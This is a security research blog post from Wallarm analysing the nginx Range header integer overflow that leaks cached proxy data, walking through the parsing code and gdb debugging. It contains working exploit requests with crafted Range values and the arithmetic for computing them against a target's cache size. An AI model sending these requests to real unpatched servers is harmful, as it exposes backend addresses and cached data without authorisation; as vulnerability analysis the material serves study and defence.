Numbers game: Exploring IntegerOverflow vulnerability in a popular nginx web server.

Wallarm
Wallarm
Published in
10 min readFeb 20, 2018

By @aLLy , Wallarm Research

There was a very interesting vulnerability discovered in nginx, one of the most popular web/proxy/load balancing servers. This vulnerability leaks information about the application behind the nginx proxy. For example, a specially formed request can retrieve information on the internal structure of an application and/or its IP address.

Turns out this issue has been around for all of ten years and the vulnerability affects versions of nginx as early as 0.5.6 up to and including 1.13.2, i.e. from 2007 to 2017. As we know, Nginx is in use in one of every four web applications. So, it would be a good idea to understand this loophole better.

WARNING

Do not try this at home! The material is provided for educational purposes only. Authors and Wallarm disclaim responsibility for any and all possible consequences for trying to reproduce this sequence.

Test stand

To conduct this experiment, we will, of course, need a test stand. Rather than spending time assembling our own distribution, let’s grab a ready-made one and proceed to the fun part. Our esteemed Chinese colleagues have assembled a ready-made docker container complete with the nginx platform boasting the vulnerability in question. The container is available from the vulapps repository. Since most of the pages are, well, in Chinese, here is the specific command to launch the container:

docker run — rm — cap-add=SYS_PTRACE — security-opt seccomp=unconfined -d

Incidentally, there are quite a few other interesting test stands in this repo. You can check them out when you have time.

After the command successfully executes, we’ll have nginx server version 1.13.1 running and accessible on port 80.

Just in case you want to get your hands dirty, you can also access the container directly and run:

apt-get update && apt-get install nano build-essential gdb nginx-dbg=1.13.1
service nginx stop && service nginx-debug start
ps -aux|grep nginx

Now you can join the worker process with the help of gdb:
gdb — pid <pid>

Don’t expect the vulnerability have a super strong impact. Still, it’s interesting to play with it.

About Range

The root-cause of vulnerability is the incorrect processing of byte ranges in the header Range. Maybe you are aware of what it does, but let include a brief overview anyways.

Basic information about Range header

Range header is used when you need to get back a part of the the server response, rather than a complete response. Acceptable header format is described in detail in HTTP 1.1 RFC2616.

According to this standard, the parameters can include selection ranges. They consist of two parts: the size of the range and the list of selection rules. The size is given in bytes.
Range: bytes=[-]<begin>-[<end>][,]

The range can be specified one of the two ways. First — you can specify the beginning and the end of the range. For this, the standard specifies that the beginning position can never be less than zero and the end position is required to be higher or equal to the beginning. If these conditions are not met, the header will be ignored. If the end of the range is specified beyond the last byte of the document or is equal to the last byte, the end position is considered to be the last byte of the document less one. Similarly, if the end position is not specified the range will end at EOF-1.

For example, if the document size is 138 bytes, than a range specified as bytes=1–137 will results in a response of 137 bytes, starting with symbol #2 and ending with the last symbol.

In addition, the answer contains the header Content-Range, where, the full size of the document being requested is specified after the slash.

The second method is selecting N bytes of the document from the end. If the document size is below the number specified in the request, then the entire document will be sent. For example, bytes=-7 requests the last 7 bytes.

Also, the spec allows to use a single Range header to specify multiple range, using comma as a separator.

Using several ranges in Range header

Interestingly, if the server response includes a header Accept-Ranges, than the server does support receiving data partially if the request includes header Range. That said, there is no guarantee, so always test to be sure!

More Details

In nginx, header Range is processed by ngx_http_range_header_filter_module, which, in turn, calls function ngx_http_range_header_filter.

/src/http/modules/ngx_http_range_filter_module.c

146: static ngx_int_t
147: ngx_http_range_header_filter(ngx_http_request_t *r)
148: {

If the request only specifies one range, than the response is the responsibility of ngx_http_range_singlepart_header, if several ranges Ngx_http_range_multipart_header.

/src/http/modules/ngx_http_range_filter_module.c

404: static ngx_int_t
405: ngx_http_range_singlepart_header(ngx_http_request_t *r,
406: ngx_http_range_filter_ctx_t *ctx)
...
455: static ngx_int_t
456: ngx_http_range_multipart_header(ngx_http_request_t *r,
457: ngx_http_range_filter_ctx_t *ctx)
458: {

The actual bug is in the ngx_http_range_parse function, which parses the ranges received in the header.

/src/http/modules/ngx_http_range_filter_module.c

268: static ngx_int_t
269: ngx_http_range_parse(ngx_http_request_t *r, ngx_http_range_filter_ctx_
270: ngx_uint_t ranges)

To get a better idea of what’s actually going on, let’s attach to the process using gdb and put a breakpoint on the line #360

gdb — pid <pid>

Now let’s send a packet with the range specified as negative.

GET / HTTP/1.1
Host: nginx.visualhack
Range: bytes=-10, -20

First, the system detects the type of the transmitted range. If we’ve requested the selection of the last N bytes of the document, than the suffix variable becomes equal to 1.

/src/http/modules/ngx_http_range_filter_module.c

304: suffix = 0;
...
308: if (*p != '-') {
...
268: static ngx_int_t
269: ngx_http_range_parse(ngx_http_request_t *r, ngx_http_range_filter_ctx_
270: ngx_uint_t ranges)
...
334: } else {
335: suffix = 1;

Next, the system parses the transmitted string one symbol at a time. While the symbols are 0 through 9 (i.e. numbers) the following code gets executed:

/src/http/modules/ngx_http_range_filter_module.c

343: while (*p >= '0' && *p <= '9') {
344: if (end >= cutoff && (end > cutoff || *p - '0' > cutlim))
345: return NGX_HTTP_RANGE_NOT_SATISFIABLE;
346: }
347:
348: end = end * 10 + *p++ - '0';
349:

After this cycle completes, the variable end will be equal to the transmitted string, only without a dash. Let’s skip a few lines that are not that interesting, and get to the condition where we want to put a break-point

/src/http/modules/ngx_http_range_filter_module.c

357: if (suffix) {
358: start = content_length — end;
359: end = content_length — 1;
360: }

Debugging requests with header Range

Now we can look at end, start and content_length variables.

At this point of execution, the pointer to the beginning point of selection (start) is equal to the content_length less the value received as the pointer to the end of the selection (end) without the minus sign. So, if we send the value which is clearly higher than the overall length of the request, what we get back is a negative value for the start of the selection.

Incorrect value for the ‘start’ position of the selection

The ‘end’ position of the selection becomes equal to the length of the response minus one. Next, the system checks overall length of the returned data and, if it’s higher than the overall length of the response, than the header is ignored. This is all as specified

/src/http/modules/ngx_http_range_filter_module.c

396: if (size > content_length) {
397: return NGX_DECLINED;
398: }

If the value of the start parameters is less than the value of the end parameter, than we start to calculate the size. First, it equals to zero. Then, the system evaluates all the transmitted ranges sequentially (if there are several) and increments the current value with the difference between the end and the start selection parameters (line 380)

We need to assemble a packet where the end size is less than the overall length of the document.

Note the type of the start, end and size parameters.

/src/http/modules/ngx_http_range_filter_module.c

295: size = 0;
...
369: found:
370:
371: if (start < end) {
372: range = ngx_array_push(&ctx->ranges);
...
377: range->start = start;
378: range->end = end;
379:
380: size += end - start;

According to the GNU C Library manual, type off_t — is a signed integer, with allowed range defined by the specific system and the compiler instructions.

If the source files are compiled with a flag _FILE_OFFSET_BITS == 64, than the size of this integer is 64 bit. This is exactly the case with nginx.

Thus, the maximum allowed value for these variables is 0x7fffffffffffffff, since the last bit is used to specify the sign.

Maximum allowed module value for a variable of the off_t type

Knowing this, we can circumvent the size > content_length check.

Because the overall size is calculated based on the data from all the transmitted range, we can specify a negative value in the first range where the read-back starts. In the second range, we will transmit a large negative value, which, when subtracted, will exceed allowed value for the off_t type and will overflow into a positive value, but less than the entire document size. Let’s clarify with an example.

Suppose we want to start reading with byte# -7000. Overall document size is 942 bytes.

With a regular request specified in Range as bytes=-7000 we get back the following:

The last condition is true — the size of returned data can not exceed the overall size of the document. Hence, the header is ignored and the server returns all the data.

To get around this, we need to add a second range, and select it in such a way that, when added to the previous value, it would exceed the allowed value of the variable size. 0x8000000000000000 is the lowest negative number that can be specified with the off_t type. To get this as a return parameter we need to reverse the calculations and add to it the value of the pointer where we want to start reading. For our example:

0x8000000000000000 + (-7000) = 9223372036854768808

Below is the request:

GET / HTTP/1.1
Host: nginx.visualhack
Range: bytes=-7000,-9223372036854768808

We’ve already considered the first range. Now, let’s take a look at what happens the second range is parsed….

Sending the second range which causes overflow

As a result of our manipulations, the second range magically turns into a pumpkin and adds just the right value to return the selection which starts from the position we specified less the size of the document, i.e. -6058–941/942

Proof of concept

start = content_length — end; # start = 942–9223372036854768808 = -92
end = content_length — 1; # end = 942–1 = 941
...
if (end >= content_length) {
end = content_length;
} else {
end++;
} # end = 942
...
if (start < end) { # -9223372036854767866 < 942 == True
...
size += end — start; # size = 7000(value from the first range) + (
...
if (size > content_length) { # -9223372036854775808 > 942 == False
return NGX_DECLINED;
}

You probably know that nginx is commonly used as a caching reverse proxy. This how our test environment is configured as well.

/etc/nginx/conf.d/default.conf

12: location ^~ /proxy/ {
13: proxy_pass http://127.0.0.1:8080/;
14: proxy_set_header HOST $host;
15: proxy_cache my_zone;
16: add_header X-Proxy-Cache $upstream_cache_status;
17: proxy_ignore_headers Set-Cookie;
18: }

All requests are sent to /proxy/ and are directed to the local Apache server and cached.

/etc/nginx/nginx.conf

27: proxy_cache_key “$scheme$request_method$host$request_uri”;
28: proxy_cache_path /tmp/nginx levels=1:2 keys_zone=my_zone:10m;
29: proxy_cache_valid 200 10m;

Cache files are stored in /tmp/nginx/ directory. To form paths and filenames, the system uses parameters, specified in proxy_cache_key directive. Let’s send a request for /proxy/demo.png and check the generated cache file.

Cache file, created after the requests

You can see that the file contains a special header plus the original response form Apache. This is exactly the data we will be able to retrieve by exploiting the overflow bug.

To make this happen, we need to take a value which is known to be larger than the document returned by the server (the document length can be found in the header as Content-Length). But should be smaller than the size of the cache file.

In our example, the range should be higher than 16 585, but lower than 17 217.

Now, following the same process as before, we can calculate the second range:

0х8000000000000000–17217 = 9223372036854758591.

Now let’s use the ranges we’ve calculated to for a request.

GET /proxy/demo.png HTTP/1.1
Host: nginx.visualhack
Range: bytes=-17217,-9223372036854758591

Now we can use the vulnerability to read the cache.

Ta-da! We have just retrieved the entire cache content including the header and the original request to the proxy server. With this, we can easily find out which application is behind the proxy and, possibly, even its IP.

Of course, there are some ready-made exploits for this vulnerability that already implement this logic.

For example, there is a version from nixawk.

Another useful exercise is to look at the code of the patch which addresses this vulnerability and see what’s inside. Who knows, you might still be able to find a bypass!

Conclusions

The results here are not Earth-shattering, it is always useful to understand the internal workings of something as popular as nginx.

It is rare that in production deployments you are able to get superadmin remote execution privileges in a single request exploiting a vulnerability. More often than not, it is a combination of vulnerabilities that allows attackers to gradually collect enough information to overtake the system and achieve interesting exploits. This vulnerability could make one of the links in chain of exploits that together, can be quite dangerous.

--

--

Wallarm
Wallarm

Adaptive Application Security for DevOps. @NGINX partner. @YCombibator S16